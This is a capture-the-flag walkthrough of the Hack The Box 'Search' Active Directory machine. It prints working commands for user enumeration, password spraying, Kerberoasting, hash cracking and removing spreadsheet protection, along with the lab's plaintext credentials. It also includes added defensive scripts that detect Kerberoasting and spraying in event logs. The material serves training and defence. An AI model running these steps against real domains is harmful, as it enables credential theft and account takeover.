htb-search-nl

Search

Enumeration

┌─[✗]─[puck@parrot-lt]─[~/htb/search]
└──╼ $nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 15:51 CET
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:51 (0:00:01 remaining)
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:52 (0:00:02 remaining)
Stats: 0:03:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:54 (0:00:05 remaining)
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for search.htb0 (10.10.11.129)
Host is up (0.096s latency).

Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=search,DC=htb
| ldapServiceName: search.htb:research$@SEARCH.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
--snip--
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
| serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=search,DC=htb
| namingContexts: CN=Configuration,DC=search,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=DomainDnsZones,DC=search,DC=htb
| namingContexts: DC=ForestDnsZones,DC=search,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 213347
| dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| dnsHostName: Research.search.htb
| defaultNamingContext: DC=search,DC=htb
| currentTime: 20220125140121.0Z
|_ configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 606.65 seconds
┌─[puck@parrot-lt]─[~/htb/search]
└──╼ $ nmap -p- -sV -sC --min-rate 4500 --max-rtt-timeout 1500ms 10.10.11.129 --open
Starting Nmap 7.92 ( https://nmap.org ) at 05:55 GMT
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.15s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &mdash; Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 05:56:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn:
|_  http/1.1
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_http-title: Search &mdash; Just Testing IIS
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-title: Site doesn't have a title.
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
|   date: T05:57:10
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap reveals a lot of open ports, most of them the usual Windows/Active Directory services (DNS, Kerberos, LDAP, SMB, RPC, IIS). Add the domain to the hosts file and look at the web server first. There is not much on the site other than the team members' names, so let's put those names in a file and enumerate which of them are valid domain usernames.

$ ./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc search.htb

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 01/03/22 - Ronnie Flathers @ropnop

2022/01/03 06:08:27 >  Using KDC(s):
2022/01/03 06:08:27 >  	search.htb:88

2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb
2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/01/03 06:08:27 >  Done! Tested 8 usernames (3 valid) in 0.152 seconds

Out of eight users only three are valid. Let's try to query the domain for users with 'Do not require Kerberos pre-authentication' set and export their TGTs for cracking.

$ ./GetNPUsers.py search.htb/ -usersfile users.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] User Dax.Santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Keely.Lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye doesn't have UF_DONT_REQUIRE_PREAUTH set

None of these accounts has 'Do not require pre-authentication' set, so we can't roast them offline this way (the AS-REP roasting step needs an account with pre-authentication disabled). We also can't dump LDAP without a valid user password, and there are no interesting directories on the web server to look into. However, there is an image on the site that contains interesting information.

Looking at the August 17 entry, it says 'Send password to Hope Sharp' and the password IsolationIsKey? is written next to it. So we have a username and password for the Hope user. We can also try password spraying this password against the accounts we found earlier.

$ crackmapexec smb search.htb -u users.txt -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye:IsolationIsKey? STATUS_LOGON_FAILURE

As you can see, this password is not valid for any of the users found earlier. Let's try it with the Hope user.

$ crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share               Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----               -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                              Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                                  Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll          READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk
SMB         10.10.11.129    445    RESEARCH         IPC$                READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON            READ            Logon server share
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$  READ,WRITE
SMB         10.10.11.129    445    RESEARCH         SYSVOL              READ            Logon server share

We have access to a couple of shares. Let's look into them.

$ smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password: IsolationIsKey?
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Mon Jan  3 06:23:12 2022
  ..                                 Dc        0  Mon Jan  3 06:23:12 2022
  abril.suarez                       Dc        0  Tue Apr  7 18:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 13:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 12:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 18:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 12:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 18:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 13:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 12:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 18:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 11:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 20:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 12:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 18:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 18:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 14:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 18:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 13:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 20:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 11:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 18:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 12:21:42 2020
  sierra.frye                        Dc        0  Thu Nov 18 01:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 20:14:26 2020

More usernames are present in this directory; let's add them to users.txt. We can access Hope's own directory, but for the rest we don't have permission to read or list the contents.

Now that we have a valid username and password, we can dump LDAP.

$ bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------

The output shows a vhost (research.search.htb); let's add that to the hosts file too. Now we can visualise this dump with the BloodHound GUI.

┌─[puck@parrot-lt]─[~/htb/search]
└──╼ $ sudo neo4j console
┌─[puck@parrot-lt]─[~/htb/search]
└──╼ $ bloodhound

Upload all the dumped data.

This is the shortest path to domain admin. However, we don't have access to any user who is a member of 'ITSEC'. We do have 'Hope Sharp', but she is not a member of ITSEC. If we look for Kerberoastable accounts instead, we find two.


This 'Web_svc' account was created by HelpDesk as a temporary account. It is used by the web service, so it is effectively a service account.

The SPN is not null, so we can Kerberoast: as a regular domain user we request a service ticket for the account and extract its hash from Active Directory, without ever sending a packet to the host that runs the service (only the DC is contacted).

https://swarm.ptsecurity.com/kerberoasting-without-spns/

$ GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 12:59:11.329031  <never>

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824

We got the hash of the web_svc service account. Let's try to crack it.

$ hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------

We got the password for the web_svc service account; let's spray it across all the accounts we have found so far.

$ crackmapexec smb search.htb -u users.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dave.simpson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kyla.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Ben.Thompson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE

One user account (edgar.jacobs) is using the same password as the service account. Let's look into that user's folder on the share.
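Both of the steps above leave a trace on the domain controller that a defender can look for. As an added example written for this page (not part of the original writeup or of any tool it uses), the Python below runs two checks over constructed sample Security-log events written in a simple key=value shape: a 4769 service-ticket request with an RC4 etype (0x17, the "etype 23" behind the $krb5tgs$23$ hash above) for a user-type service account, and a burst of 4625 logon failures from one source against many different accounts, which is what the spray looks like from the DC's side. The event lines, addresses and account names in the sample are constructed; real 4769/4625 events would have to be exported into this form first.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from the box): one key=value line per Security
# event, carrying only the fields these two checks use.
SAMPLE_EVENTS = [
    # 4769 service ticket requests. etype 0x17 = RC4-HMAC, the ticket type behind
    # $krb5tgs$23$ hashes; 0x12 = AES256-CTS, the normal case in a modern domain.
    "ts=2022-01-03T06:30:01 id=4769 user=Hope.Sharp service=krbtgt etype=0x12 src=10.10.14.5",
    "ts=2022-01-03T06:30:02 id=4769 user=Hope.Sharp service=web_svc etype=0x17 src=10.10.14.5",
    "ts=2022-01-03T06:30:02 id=4769 user=Hope.Sharp service=sql_svc etype=0x17 src=10.10.14.5",
    "ts=2022-01-03T06:30:03 id=4769 user=Hope.Sharp service=RESEARCH$ etype=0x12 src=10.10.14.5",
    # 4625 failed logons: one source trying one password against many accounts.
    "ts=2022-01-03T06:40:00 id=4625 user=dave.simpson status=0xC000006A src=10.10.14.5",
    "ts=2022-01-03T06:40:00 id=4625 user=Dax.Santiago status=0xC000006A src=10.10.14.5",
    "ts=2022-01-03T06:40:01 id=4625 user=Keely.Lyons status=0xC000006A src=10.10.14.5",
    "ts=2022-01-03T06:40:01 id=4625 user=Sierra.Frye status=0xC000006A src=10.10.14.5",
    "ts=2022-01-03T06:40:02 id=4625 user=Kyla.Stewart status=0xC000006A src=10.10.14.5",
    "ts=2022-01-03T06:40:02 id=4625 user=Chris.Stewart status=0xC000006A src=10.10.14.5",
    # One user mistyping their own password three times is not a spray.
    "ts=2022-01-03T07:10:00 id=4625 user=abril.suarez status=0xC000006A src=10.10.20.9",
    "ts=2022-01-03T07:10:20 id=4625 user=abril.suarez status=0xC000006A src=10.10.20.9",
    "ts=2022-01-03T07:10:45 id=4625 user=abril.suarez status=0xC000006A src=10.10.20.9",
]

WRONG_PASSWORD = {"0xC000006A", "0xC000006D"}   # bad password / bad user-or-password
RC4_ETYPES = {"0x17", "0x18"}                   # RC4-HMAC and RC4-HMAC-EXP


def parse_event(line):
    """Turn one key=value line into a dict with a real timestamp and integer event id."""
    ev = dict(re.findall(r"(\w+)=(\S+)", line))
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["id"] = int(ev["id"])
    return ev


def parse_events(lines):
    return [parse_event(line) for line in lines]


def rc4_service_ticket_requests(events):
    """Kerberoast indicator: a 4769 with an RC4 etype for a service that is neither
    krbtgt nor a machine account (machine SPNs end in '$'). Returns (user, service) pairs."""
    hits = []
    for ev in events:
        if ev["id"] != 4769 or ev.get("etype") not in RC4_ETYPES:
            continue
        svc = ev["service"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        hits.append((ev["user"], svc))
    return hits


def spray_sources(events, min_accounts=5, window=timedelta(minutes=5)):
    """Spray indicator: return {src: [accounts]} for every source whose wrong-password
    failures hit at least `min_accounts` distinct accounts inside some `window`."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["id"] == 4625 and ev.get("status") in WRONG_PASSWORD:
            by_src[ev["src"]].append((ev["ts"], ev["user"].lower()))
    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()
        best, start = set(), 0
        for end in range(len(attempts)):
            # slide the window start forward until it spans at most `window`
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_accounts:
            flagged[src] = sorted(best)
    return flagged


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("RC4 service tickets:", rc4_service_ticket_requests(evs))
    print("spray sources:", spray_sources(evs))
```

The RC4 check is the cheap, high-signal one: once a domain has AES keys for its service accounts, an RC4 ticket for a user-type SPN is almost always a roasting tool asking for the weakest etype. The spray check keys on distinct accounts per source rather than failure count, which is what separates a spray from a single user locked out of their own account.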

$ smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password: @3ONEmillionbaby
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 10:02:16 2020
  ..                                DRc        0  Mon Aug 10 10:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 20:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 10:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 20:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 10:35:44 2020

                3246079 blocks of size 4096. 458055 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx

There's an XLSX file; download it to your machine.
This workbook has two sheets: one holds the passwords captured by the phishing campaign and the other a list of usernames. The lock symbol on the second sheet shows that a column is protected (hidden) with a password; you can confirm this by resizing the cells between lastname and Username. There are two ways to remove the protection. The easiest is to upload the file to Google Drive and open it in Sheets, which drops the protection for you. To remove it manually, unzip the xlsx file and delete the element below from xl/worksheets/sheet2.xml:
<sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
Once that line is deleted, zip the directory back up:
$ zip -r Phishing.xls .
Open the file and double-click the boundary between columns B and D to unhide the password column.

firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
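Sheet protection is a UI lock, not encryption: the hidden column's cells sit as plain text inside the zip, which is why deleting the sheetProtection element (or letting Google Sheets drop it) reveals them. As an added example written for this page (not code from the writeup), the Python below builds a minimal constructed workbook with a SHA-512 sheetProtection element and a hidden column C, then audits it: for each worksheet it reports whether protection is set, which columns are hidden, and what the hidden cells contain, read straight from the XML. The hash and salt values in the sample are placeholders, and the parser only handles inline-string cells (real workbooks usually store text in xl/sharedStrings.xml).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}

# Constructed sample worksheet (not the file from the box): sheet protection with a
# SHA-512 hash, column C hidden, and a few inline-string cells. Hash/salt are placeholders.
SAMPLE_SHEET_XML = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="{MAIN_NS}">
  <sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER_HASH"
                   saltValue="PLACEHOLDER_SALT" spinCount="100000"
                   sheet="1" objects="1" scenarios="1"/>
  <cols><col min="3" max="3" width="0" hidden="1" customWidth="1"/></cols>
  <sheetData>
    <row r="1">
      <c r="A1" t="inlineStr"><is><t>firstname</t></is></c>
      <c r="C1" t="inlineStr"><is><t>password</t></is></c>
      <c r="D1" t="inlineStr"><is><t>Username</t></is></c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr"><is><t>Example</t></is></c>
      <c r="C2" t="inlineStr"><is><t>example-secret-1</t></is></c>
      <c r="D2" t="inlineStr"><is><t>Example.User</t></is></c>
    </row>
  </sheetData>
</worksheet>"""


def build_sample_xlsx():
    """Pack the sample sheet into a zip laid out like an .xlsx (only the part we read)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/worksheets/sheet2.xml", SAMPLE_SHEET_XML)
    return buf.getvalue()


def column_index(cell_ref):
    """'C2' -> 3: the letter part of a cell reference as a 1-based column number."""
    letters = re.match(r"[A-Z]+", cell_ref).group(0)
    n = 0
    for ch in letters:
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def audit_workbook(xlsx_bytes):
    """For every worksheet: is <sheetProtection> present, which hash algorithm it names,
    which column ranges are hidden, and the text of every cell in a hidden column.
    The text comes straight from the XML; the protection hash never enters into it."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for name in sorted(zf.namelist()):
            if not (name.startswith("xl/worksheets/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(zf.read(name))
            prot = root.find("m:sheetProtection", NS)
            hidden = [(int(c.get("min")), int(c.get("max")))
                      for c in root.findall("m:cols/m:col", NS) if c.get("hidden") == "1"]
            hidden_cells = []
            for cell in root.findall("m:sheetData/m:row/m:c", NS):
                col = column_index(cell.get("r"))
                if any(lo <= col <= hi for lo, hi in hidden):
                    text = "".join(t.text or "" for t in cell.findall("m:is/m:t", NS))
                    hidden_cells.append((cell.get("r"), text))
            report[name] = {
                "protected": prot is not None,
                "algorithm": prot.get("algorithmName") if prot is not None else None,
                "hidden_columns": hidden,
                "hidden_cells": hidden_cells,
            }
    return report


if __name__ == "__main__":
    for sheet, info in audit_workbook(build_sample_xlsx()).items():
        print(sheet, info)
```

Run against a real workbook by passing the file's bytes to audit_workbook; a sheet that is "protected" with hidden columns full of credentials is exactly the finding this spreadsheet represents, and the fix is not a stronger sheet password but keeping the data out of the file.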

Now we have 15 more usernames and passwords. If we look at the BloodHound path to domain admin, only two of these users are on it: Abby and Sierra. Abby's password didn't work, but Sierra's did.

$ smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password: $$49=wide=STRAIGHT=jordan=28$$18
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Thu Nov 18 01:08:00 2021
  ..                                DRc        0  Thu Nov 18 01:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 18:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 14:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 12:28:05 2020
  user.txt                           Ac       33  Thu Nov 18 00:55:27 2021

